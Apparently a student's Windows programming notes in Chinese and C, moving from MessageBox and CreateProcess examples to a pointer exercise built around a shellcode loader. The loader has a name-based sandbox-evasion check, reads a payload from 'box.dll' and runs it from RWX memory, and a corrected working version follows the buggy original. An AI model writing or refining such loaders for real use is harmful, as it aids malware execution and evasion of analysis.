1.Windows API
1.1 MessageBox
#include<stdio.h>
#include<Windows.h>
/* Worker-thread entry point: shows an empty message box, then ends the thread.
 * lpParameter is whatever CreateThread's caller passed; it is not used here.
 * Always returns 0 as the thread exit code. */
DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
    (void)lpParameter;
    /* NULL owner/text/caption and MB_OK (== 0): same call as MessageBox(0, 0, 0, 0). */
    MessageBox(NULL, NULL, NULL, MB_OK);
    return 0;
}
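/* Entry point: runs ThreadProc on a new thread and blocks until it exits.
 * Returns 0 on success, 1 if the thread could not be created.
 * Fixes over the original: the CreateThread handle was used unchecked (a NULL
 * handle would have been passed to WaitForSingleObject) and never closed; the
 * timeout -1 is spelled with its named constant INFINITE. */
int main(void)
{
    HANDLE thread = CreateThread(NULL, 0, ThreadProc, NULL, 0, NULL);
    if (thread == NULL) {
        fprintf(stderr, "CreateThread failed (error %lu)\n", GetLastError());
        return 1;
    }
    WaitForSingleObject(thread, INFINITE);
    /* Release the handle; the thread object itself is already finished. */
    CloseHandle(thread);
    return 0;
}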
1.2 CreateThread
1.3 CreateProcess
#include<stdio.h>
#include<Windows.h>
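/* Entry point: starts Microsoft Edge on www.baidu.com as a child process.
 * Returns 0 on success, -1 if CreateProcessA fails (the error code is printed).
 * Fixes over the original listing: the stray "};" that preceded main (a syntax
 * error) is removed; the application path had no space in "Program Files (x86)"
 * and could never resolve; both PROCESS_INFORMATION handles are now closed. */
int main(void)
{
    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    /* Writable array rather than a string literal: the W variant of
     * CreateProcess may modify the command-line buffer in place. */
    char cmdLine[] = "msedge www.baidu.com";

    /* Passing an explicit lpApplicationName avoids the path-search rules that
     * apply when it is NULL and the command line holds an unquoted path. */
    if (!CreateProcessA("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe",
                        cmdLine, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi)) {
        fprintf(stderr, "CreateProcess failed (error %lu)\n", GetLastError());
        return -1;
    }
    /* We do not wait on the child; just drop our references to its objects. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}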
1.4 VirtualAlloc
2.指针
2.1 形参与实参的传递
2.2 双重指针
2.3 读取文件到缓冲区
原始错误代码:
#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#pragma warning(disable:4996)
/*
要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/
/* Copies the local computer name into hostName; TRUE on success, FALSE otherwise.
 * DEFECT (part of the exercise, left in place): hostName is a pointer parameter,
 * so sizeof(hostName) is the pointer size (4 or 8), not the caller's MAX_PATH
 * buffer. GetComputerNameA therefore fails with ERROR_BUFFER_OVERFLOW for any
 * name that does not fit in that many bytes including the terminator. The real
 * capacity must be passed in, or MAX_COMPUTERNAME_LENGTH + 1 used. */
BOOL GetHostName(CHAR* hostName)
{
DWORD hostNameLen = sizeof(hostName);
if (!GetComputerNameA(hostName, &hostNameLen)) // Win32 API: arg 1 is the output buffer, arg 2 the address of its size (in: capacity, out: name length)
{
return FALSE;
}
return TRUE;
}
/* Heuristic sandbox check on the computer name.
 * Note the inverted naming: returns TRUE when the name does NOT contain
 * "sandbox" (printing "not in sandbox"), FALSE when it does or when the name
 * cannot be read. strstr is case-sensitive.
 * DEFECT (part of the exercise, left in place): the trailing "/rstr ..." on the
 * strstr line is a mangled "//strstr ..." comment; as written it is a division
 * by an undeclared identifier and does not compile. */
BOOL CheckIsSandbox()
{
CHAR hostName[MAX_PATH] = { 0 };
CHAR* sandboxName = "sandbox";
if(!GetHostName(hostName))
return FALSE;
if (!strstr(hostName, sandboxName)) /rstr 字符串比较函数 bool类型
{
printf("%s\n", "not in sandbox");
return TRUE;
}
return FALSE;
}
/* Intended contract: read all of "box.dll" into a heap buffer and hand the
 * buffer and its size back through the out-parameters.
 * DEFECTS (part of the exercise, left in place):
 *  - shellcodeBuffer is char*, so "*shellcodeBuffer = &buffer" stores the
 *    address of a local pointer into a single char (and the caller passes NULL,
 *    so it is a NULL write); the parameter must be char** and receive buffer.
 *  - "*shellcodeSize = &file_size" stores an address where a DWORD is expected;
 *    it should be the value (DWORD)file_size.
 *  - buffer is declared WCHAR* but assigned a char* and read with fread of chars.
 *  - fopen receives a wide literal L"box.dll" but takes a narrow string.
 *  - fseek/ftell/fread results are unchecked (ftell returns -1 on error; a
 *    zero-length file makes calloc(0,1) look like an allocation failure). */
BOOL ReadPayload(char* shellcodeBuffer, PDWORD shellcodeSize)
{
FILE* file = { 0 };
WCHAR* buffer = NULL;
SIZE_T file_size = { 0 };
file = fopen(L"box.dll", "rb"); // open the file
if (file == NULL) {
perror("Error opening file");
return FALSE;
}
fseek(file, 0, SEEK_END); // get the file size
file_size = ftell(file);
rewind(file);
buffer = (char*)calloc(file_size, 1);
if (buffer == NULL) {
perror("Memory allocation error");
fclose(file);
return FALSE;
}
fread(buffer, sizeof(char), file_size, file); // read the file contents into the buffer we allocated
*shellcodeBuffer = &buffer;
*shellcodeSize = &file_size;
fclose(file);// close the file
return TRUE;
}
/* Copies shellcode into a new buffer and calls it as a void() function.
 * Returns FALSE without executing when shellcodeSize is 0, TRUE if the call
 * returns.
 * DEFECTS (part of the exercise, left in place):
 *  - calloc memory is not executable; with DEP on, jumping into it faults.
 *    Executable memory must come from VirtualAlloc (see the revised listing).
 *  - the calloc result is unchecked and never freed.
 *  - shellcodeBuffer is declared PVOID* (pointer to pointer) where a plain
 *    LPVOID is meant. */
BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
PVOID* shellcodeBuffer = NULL;
if (shellcodeSize == 0)
{
printf("Invalid shellCode length\n");
return FALSE;
}
shellcodeBuffer = calloc(shellcodeSize, 1);
memcpy(shellcodeBuffer, shellcode, shellcodeSize);
((void(*)())shellcodeBuffer)();
return TRUE;
}
/* Entry point of the original (buggy) listing: runs the payload only when
 * CheckIsSandbox() returns TRUE, which - given that function's inverted
 * naming - means the computer name does NOT contain "sandbox".
 * DEFECT (part of the exercise, left in place): shellcodeBuffer is passed by
 * value, so ReadPayload can never update the caller's pointer; it must be
 * passed as &shellcodeBuffer with a char** parameter. The buffer is also never
 * freed. */
int main()
{
if (!CheckIsSandbox())
{
return 1;
}
else
{
CHAR* shellcodeBuffer = NULL;
DWORD shellcodeSize = 0;
if(!ReadPayload(shellcodeBuffer, &shellcodeSize))
return 1;
ExecShellcode(shellcodeBuffer, shellcodeSize);
}
return 0;
}
根据本次学习修稿后:
#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#pragma warning(disable:4996)
/*
要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗
要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/
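/* Copies the local computer name (NetBIOS form) into hostName as a
 * NUL-terminated string. Returns TRUE on success, FALSE if hostName is NULL or
 * GetComputerNameA fails (GetLastError() then holds the reason).
 * Precondition: hostName has room for at least MAX_COMPUTERNAME_LENGTH + 1
 * bytes; the caller in this file passes a MAX_PATH array, which is larger.
 * Fix: the previous version used sizeof(hostName), which for a pointer
 * parameter is the pointer size rather than the buffer size, so the API failed
 * with ERROR_BUFFER_OVERFLOW for any name that did not fit in 4/8 bytes. */
BOOL GetHostName(CHAR* hostName)
{
    /* In/out: capacity on entry, name length (without NUL) on success. */
    DWORD hostNameLen = MAX_COMPUTERNAME_LENGTH + 1;

    if (hostName == NULL) {
        return FALSE;
    }
    if (!GetComputerNameA(hostName, &hostNameLen)) {
        return FALSE;
    }
    return TRUE;
}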
/* Heuristic sandbox check on the computer name.
 * The naming is inverted and kept for callers: returns TRUE when the name does
 * NOT contain "sandbox" (after printing "not in sandbox"), FALSE when it does
 * or when the name cannot be read. The comparison is case-sensitive. */
BOOL CheckIsSandbox()
{
    static const CHAR marker[] = "sandbox";
    CHAR name[MAX_PATH] = { 0 };

    if (!GetHostName(name)) {
        return FALSE;
    }
    if (strstr(name, marker) != NULL) {
        return FALSE;
    }
    printf("%s\n", "not in sandbox");
    return TRUE;
}
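/* Reads the whole of "box.dll" (resolved against the current working directory)
 * into a heap buffer. On success *shellcodeBuffer receives the buffer - the
 * caller owns it and must free() it - and *shellcodeSize its length in bytes;
 * returns TRUE. On any failure returns FALSE, reports on stderr, and leaves the
 * out-parameters untouched.
 * Fixes over the previous version: fseek/ftell are checked (ftell returns -1 on
 * error), an empty file is rejected instead of surfacing as a misleading
 * "Memory allocation error" from calloc(0, 1), a short fread is rejected rather
 * than handing back a partially filled buffer, and a length that does not fit
 * the DWORD out-parameter is refused instead of silently truncated. */
BOOL ReadPayload(char** shellcodeBuffer, DWORD* shellcodeSize)
{
    BOOL ok = FALSE;
    FILE* file = NULL;
    char* buffer = NULL;
    long fileLen = 0;
    size_t fileSize = 0;

    if (shellcodeBuffer == NULL || shellcodeSize == NULL) {
        return FALSE;
    }

    file = fopen("box.dll", "rb");
    if (file == NULL) {
        perror("Error opening file");
        return FALSE;
    }

    /* Size the file by seeking to its end. */
    if (fseek(file, 0, SEEK_END) != 0) {
        perror("Error seeking file");
        goto out_close;
    }
    fileLen = ftell(file);
    if (fileLen < 0) {
        perror("Error sizing file");
        goto out_close;
    }
    rewind(file);
    if (fileLen == 0) {
        fprintf(stderr, "Payload file is empty\n");
        goto out_close;
    }
    /* No-op where long is 32-bit; matters on LP64 toolchains. */
    if ((unsigned long)fileLen > MAXDWORD) {
        fprintf(stderr, "Payload file too large\n");
        goto out_close;
    }
    fileSize = (size_t)fileLen;

    buffer = (char*)calloc(fileSize, 1);
    if (buffer == NULL) {
        perror("Memory allocation error");
        goto out_close;
    }
    if (fread(buffer, 1, fileSize, file) != fileSize) {
        fprintf(stderr, "Error reading file\n");
        goto out_close;
    }

    *shellcodeBuffer = buffer;
    *shellcodeSize = (DWORD)fileSize;
    buffer = NULL; /* ownership transferred to the caller */
    ok = TRUE;

out_close:
    free(buffer); /* NULL (no-op) on the success path */
    fclose(file);
    return ok;
}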
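/* Copies shellcode into a fresh executable mapping and calls it as a void()
 * function. Returns FALSE without executing when shellcode is NULL,
 * shellcodeSize is 0, or VirtualAlloc fails; returns TRUE if the call returns.
 * Fixes over the previous version: the VirtualAlloc result was used unchecked
 * (NULL dereference in memcpy on failure) and the mapping was never released;
 * the local was declared PVOID* where a plain LPVOID is meant.
 * NOTE(review): the region is still allocated RWX as before. A least-privilege
 * variant would allocate PAGE_READWRITE, copy, then VirtualProtect to
 * PAGE_EXECUTE_READ before the call. */
BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
    LPVOID region = NULL;

    if (shellcodeSize == 0) {
        printf("Invalid shellCode length\n");
        return FALSE;
    }
    if (shellcode == NULL) {
        printf("Invalid shellCode buffer\n");
        return FALSE;
    }

    region = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (region == NULL) {
        fprintf(stderr, "VirtualAlloc failed (error %lu)\n", GetLastError());
        return FALSE;
    }
    memcpy(region, shellcode, shellcodeSize);
    ((void(*)(void))region)();

    /* Only reached if the payload returns. */
    VirtualFree(region, 0, MEM_RELEASE);
    return TRUE;
}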
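/* Entry point of the revised listing: loads the payload from box.dll and runs it.
 * Returns 1 if the payload cannot be read or executed, 0 otherwise.
 * Unlike the first listing, no CheckIsSandbox() gate is applied here; that
 * function is defined above but not called.
 * Fixes over the previous version: the meaningless inner brace block is gone,
 * ExecShellcode's result is checked, and the buffer ReadPayload hands over
 * (heap-allocated with calloc) is freed. */
int main()
{
    CHAR* shellcodeBuffer = NULL;
    DWORD shellcodeSize = 0;
    int rc = 0;

    if (!ReadPayload(&shellcodeBuffer, &shellcodeSize)) {
        return 1;
    }
    if (!ExecShellcode(shellcodeBuffer, shellcodeSize)) {
        rc = 1;
    }
    free(shellcodeBuffer); /* ReadPayload transfers ownership to the caller */
    return rc;
}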